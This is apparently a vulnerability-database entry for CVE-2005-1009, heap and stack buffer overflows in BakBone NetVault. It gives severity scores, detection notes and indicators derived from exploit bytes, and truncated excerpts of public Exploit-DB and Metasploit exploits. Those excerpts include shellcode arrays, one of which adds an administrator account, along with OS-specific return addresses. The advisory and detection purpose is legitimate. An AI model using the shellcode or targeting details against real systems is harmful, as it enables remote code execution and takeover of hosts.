CVE-2005-1009
Published 2005-05-02
Priority: P356 · CVSS 2.0 base score 10 (critical) · Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 57.02% (98.9th percentile)
Multiple buffer overflows in BakBone NetVault 6.x and 7.x allow (1) remote attackers to execute arbitrary code via a modified computer name and length that leads to a heap-based buffer overflow, or (2) local users to execute arbitrary code via a long Name entry in the configure.cfg file.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bakbone | netvault | — | — |
| bakbone | netvault | — | — |
Detection & IOCs (extracted from sources)
- bytes: \xeb\x0a (JMP short at offset 32790) + \x7e\x6d\x03\x75 (ret Win2k SP4) / \x7c\x36\x9b\xbd (ret WinXP SP0/SP1)
- bytes: ret Win2k SP4: \x7e\x6d\x03\x75; UEF Win2k SP4: \x4c\x14\x54\x7c; ret WinXP SP1: \xbd\x9b\x36\x7c; UEF WinXP SP1: \xb4\x73\xed\x77
- bytes: \x81\xc4\xff\xef\xff\xff\x44 (PrependEncoder / stack adjustment)
- bytes: char vul[]="\x4E\x61\x6D\x65\x3D"; ("Name=" — vulnerable cfg key)
- bytes: char esp[]="\xDD\x20\x02\x10"; (local exploit return address)
- The exploit sends the overflow buffer multiple times (up to 15 reconnections) to trigger the heap corruption; detect repeated large TCP connections to port 20031 from the same source IP within seconds.
- For the local exploit vector, monitor writes to configure.cfg in the NetVault installation directory for a 'Name=' entry that is abnormally long (stack buffer overflow trigger).
- The version check response from a vulnerable NetVault server contains the string 'NVBuild'; use this to fingerprint exposed services on port 20031.
- Return addresses and UEF overwrites are OS/SP-specific. The exploit targets Windows 2000 SP4 and Windows XP SP0/SP1 English only; different patch levels or locales require different gadget addresses.
- The payload bad characters are \x00 and \x20 (null byte and space); shellcode or signatures containing these bytes will not be delivered correctly by the exploit.
No detection rules found.
Exploit-DB · exploitdb · 2010-09-20 · CVE-2005-1009
BakBone NetVault - Remote Heap Overflow (Metasploit)
---
```ruby
##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BakBone NetVault Remote Heap Overflow',
  'Description' => %q{
    This module exploits a heap overflow in the BakBone NetVault
    Process Manager service. This code is a direct port of the netvault.c
    code written by nolimit and BuzzDee.
  },
  'Author' => [ 'hdm', '' ],
  'Version' => '$Revision: 10394 $',
  'References' =>
    [
      ['CVE', '2005-1009'],
      ['OSVDB', '15234'],
      ['BID', '12967'
```
Exploit-DB · exploitdb · 2005-05-17 · CVE-2005-1547
BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)
---
```c
/* Bakbone Netvault heap overflow exploit.
Software Hole discovered by BuzzDee
POC written by nolimit and BuzzDee.
As class101 has already shown, this application has a lot of holes.
This is another remote heap overflow. This was tested on the demo version
of netvault. We considered mailing the vendor on this one, but figured we'd receive
the same response class did, which was none. So perhaps a second critical vulnerability
will wake Bakbone up to their software faults.
A note to skiddies about this exploit
This won't really net you a lot of elite b0xes because class101's isn't patched,
so it's just as vulnerable as this. Not to mention the fact that not many businesses
use this software anyway.
..Maybe it's because of all
```
Exploit-DB · exploitdb · 2005-04-01 · CVE-2005-1009
BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)
---
```c
/*
for more informations class101.org/netv-remhbof.pdf
*/
#include
#include
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"
```
Exploit-DB · exploitdb · 2005-04-01 · CVE-2005-1009
BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow
---
```c
/*
for more informations class101.org/netv-locsbof.pdf
*/
#include
#include
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
char scode1[]=
/*add u:class101 p:class101 (*Administrators *users)*/
"\x33\xC9\x83\xE9\xC7\xE8\xFF\xFF\xFF\xFF\xC0\x5E\x81\x76\x0E\x15"
"\x90\x39\xE8\x83\xEE\xFC\xE2\xF4\xE9\x78\x7F\xE8\x15\x90\xB2\xAD"
"\x29\x1B\x45\xED\x6D\x91\xD6\x63\x5A\x88\xB2\xB7\x35\x91\xD2\x0B"
"\x3B\xD9\xB2\xDC\x9E\x91\xD7\xD9\xD5\x09\x95\x6C\xD5\xE4\x3E\x29"
"\xDF\x9D\x38\x2A\xFE\x64\x02\xBC\x31\x94\x4C\x0B\x9E\xCF\x1D\xE9"
"\xFE\xF6\xB2\xE4\x5E\x1B\x66\xF4\x14\x7B\xB2\xF4\x9E\x91\xD2\x61"
"\x49\xB4\x3D\x2B\x2
```
Metasploit · metasploit
BakBone NetVault Remote Heap Overflow
This module exploits a heap overflow in the BakBone NetVault Process Manager service. This code is a direct port of the netvault.c code written by nolimit and BuzzDee.
References:
- http://secunia.com/advisories/14814
- http://securitytracker.com/id?1013625
- http://www.class101.org/netv-locsbof.pdf
- http://www.class101.org/netv-remhbof.pdf
- http://www.hat-squad.com/en/000164.html
- http://www.hat-squad.com/en/000165.html
- http://www.securityfocus.com/archive/1/394801
- http://www.securityfocus.com/bid/12967
- https://exchange.xforce.ibmcloud.com/vulnerabilities/19932
Published 2005-05-02